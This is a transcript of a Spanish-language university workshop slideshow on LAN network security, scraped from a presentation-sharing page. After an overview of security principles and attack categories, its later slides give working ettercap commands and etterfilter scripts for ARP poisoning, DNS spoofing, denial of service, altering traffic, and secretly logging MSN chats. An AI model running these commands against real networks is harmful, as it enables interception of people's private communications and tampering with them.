Seguridad de redes (congreso)

  • 1,371 views
Uploaded on

Taller brindado en la Universidad Privada de Bolivia. …

Taller brindado en la Universidad Privada de Bolivia.
Seguridad en redes LAN

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
1,371
On Slideshare
0
From Embeds
0
Number of Embeds
2

Actions

Shares
Downloads
83
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. III Congreso Boliviano
    de Ingeniería y Tecnología
    Seguridad en redes
    Ing. Jorge Orellana Araoz
    Docente Investigador MEMI-UMSS
    Univ. Gonzalo Nina
    Auxiliar Centro MEMI-UMSS
  • 2. Seguridad
    La seguridad de las redes es una parte integral de las redes informáticas. Incluye protocolos, tecnologías, dispositivos, herramientas y técnicas que aseguran los datos y reducen las amenazas.
    La mayor motivación de la seguridad en redes es el esfuerzo por mantenerse un paso más adelante de los hackers malintencionados. Del mismo modo que los médicos intentan prevenir nuevas enfermedades tratando problemas existentes, los profesionales de la seguridad en redes intentan prevenir ataques minimizando los efectos de los ataques en tiempo real.
    2
  • 3. Seguridad
  • 4. Confidencialidad
    Integridad
    Disponibilidad
    Propiedades de la SeguridadInformatica
  • 5. Procesamiento
    Almacenamiento
    Transmision
    Estados de la Informacion
  • 6. Politicas y Procedimientos
    Tecnologia
    Educacion, Entrenamiento, y Conocimiento
    Medidas de Seguridad
  • 7. Procesamiento
    Almacenamiento
    Transmision
    Confidencialidad
    Integridad
    Disponibilidad
    Politicas y Procedimientos
    Tecnologia
    Educacion, Entrenamiento, y Conocimiento
    Modelo de Seguridad de Informacion
  • 8. Administracion de Riesgos
    El proceso de asegurar y cuantificar los riesgos hasta establecer un nivel aceptable de riesgo en la organización.
    El riego puede ser mitigado, pero nunca eliminado.
  • 9. Amenazas a la Seguridad
    9
    Ataques de reconocimiento
    Descubrimiento y mapeo de sistemas, servicios o vulnerabilidades sin autorización.
    Ataques de acceso
    Explotar vulnerabilidades conocidas en servicios de autenticación, FTP y web para ganar acceso a cuentas web, bases de datos confidenciales y otra información sensible.
    Ataques de Denegación de Servicio
    Envíar un número extremadamente grande de solicitudes en una red o Internet. Estas solicitudes excesivas hacen que la calidad de funcionamiento del dispositivo víctima sea inferior y no estar disponible para acceso y uso legítimo.
  • 10. Ataques de Reconocimiento
    10
    • Sniffers de paquetes
    • 11. Barridos de ping
    • 12. Escaneo de puertos
    • 13. Búsquedas de información en Internet
  • Ataques de Acceso
    11
    • Ataques de contraseña
    • 14. Explotación de la confianza
    • 15. Redirección de puerto
    • 16. Ataque Man in theMiddle
    • 17. Desbordamiento de buffer
  • Ataques de DoS
    12
  • AtaquesEspecificos de Red
    ARP Attack
    Brute Force Attack
    Worms
    Flooding
    Sniffers
    Spoofing
    Redirected Attacks
    Tunneling Attack
    Covert Channels
  • 24. Etapas de un ataque
    Hoy en dia los atacantestienengrancantidad de blancos de ataque. Su grandesafioesseleccionarlasvictimasmasvulnerables. Para estorealizanataquesmuybienplaneados y estructurados. Estosataquestienenetapaslogisticas y estrategicascomunes:
    Reconocimiento
    Exploracion (direcciones, puertos, vulnerabilidades)
    Ganaracceso
    MantenerAcceso
    CubrirPistas
  • 25. Contramedidas
    DMZ/NAT
    IDS/IPS
    Content Filtering/NAC
    Firewalls/proxy services
    Authentication/Authorization/Accounting
    Self-defending networks
    Policies, procedures, standards guidelines
    Training and awareness
  • 26. Ataques En Redes LAN
    La seguridad en Redes LAN es muchas veces inexistente y para probarlo se describen los pasos necesarios para realizar algunos ataques en redes de area local.
    Escenario Una red de area local (LAN) equipos interconectados mediante dispositivos de networking como ser concentradores (HUBs) o encaminadores (switch). El equipo atacante tiene que estar en la misma red que el equipo victima.
    16
  • 27. Envenenamiento ARP
    Lanzar ataque:
    root@bt#ettercap -T -q -i eth0 -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO
    Donde:
    - T : modo Texto
    - q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante.
    - i : Eleccion de la interfaz
    - M : Metodoarp
    17
  • 28. Envenenamiento ARP
  • 29. Envenenamiento ARP
  • 30. Envenenamiento ARP
  • 31. Envenenamiento ARP
    21
  • 32. Envenenamiento ARP
    22
  • 33. Envenenamiento ARP
    23
  • 34. Envenenamiento ARP
    24
  • 35. DNS Spoof
    1. Editar archivo de conguracion DNS
    /usr/share/ettercap/etter.dns
    dominio A direccion-ip
    25
  • 36. DNS Spoof
    2. Lanzar el Ataque:
    root@bt#ettercap -T -q -i eth0 -P dnsspoof -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO
    • T : modo Texo
    • 37. q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante.
    • 38. i : Eleccion de la interfaz
    • 39. P : Activa el plugindnsspoof(previa conguracion)
    - M : Metodoarp
    - P : Activa el plugindnsspoof
  • 40.
  • 41. D.O.S Denial of Service -Denegacion de Servicio
    1. Lanzar ataque:
    root@bt#ettercap -T -q -i eth0 -P dos attack -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO
    - T : modo Texo
    - q : quiet(No hace ruido) no muestra todo lo que captura solo lo importante.
    - i : Eleccion de la interfaz
    - M : Metodoarp
    • P : Activa el plugin dos attack
    2. Asignar valores
    Insert victim IP: ip de la victima.
    Insertunused IP: ip a donde direccionar el trafico.
    28
  • 42.
  • 43. Denegacion de Servicio
    30
  • 44. Denegacion de Servicio
    31
  • 45. Cambio de datos
    1. Crear el filtro de cambio
    Archivo banner
    ---------------------------------------------
    # replace the FTP prompt por SSH
    if (tcp.src == 21) {
    replace("FTP","SSH");
    }
    ---------------------------------------------
    2. compilar:
    root@bt#etterfilterbanner -o banner.ef
    3. Ejecutar el filtro + envenamiento ARP
    root@bt#ettercap -T -q -i eth0 -F banner.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO
    32
  • 46.
  • 47. Alteracion de Conversaciones (Caso MSN Messenger)
    1. Crear el filtro de cambio
    Archivo msn
    -------------------------------------------------
    34
  • 48. Alteracion de Conversaciones(Caso MSN Messenger)
    2. compilar:
    root@bt#etterfiltermsn -o msn.ef
    3. Ejecutar el filtro + envenamiento ARP
    root@bt#ettercap -T -q -i eth0 -F msn.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO
    35
  • 49.
  • 50. Grabar Chat
    1. Crear el filtro de guardar conversaciones
    Archivo ver chat
    --------------------------------------------------
    if (tcp.src == 1863 || tcp.dst == 1863) {
    log(DATA.data, "/tmp/msn.log");
    msg("Texto plano MSN Guardado!XDn");
    }
    --------------------------------------------------
    37
  • 51. Grabar Chat
    2. compilar:
    root@bt#etterfilterverchar -o verchat.ef
    3. Ejecutar el filtro + envenamiento ARP
    root@bt#ettercap -T -q -i eth0 -F verchat.ef -M arp:remote MAC/IP/PUERTO MAC/IP/PUERTO
    4. Revisar el archivo /tmp/msn.log
    38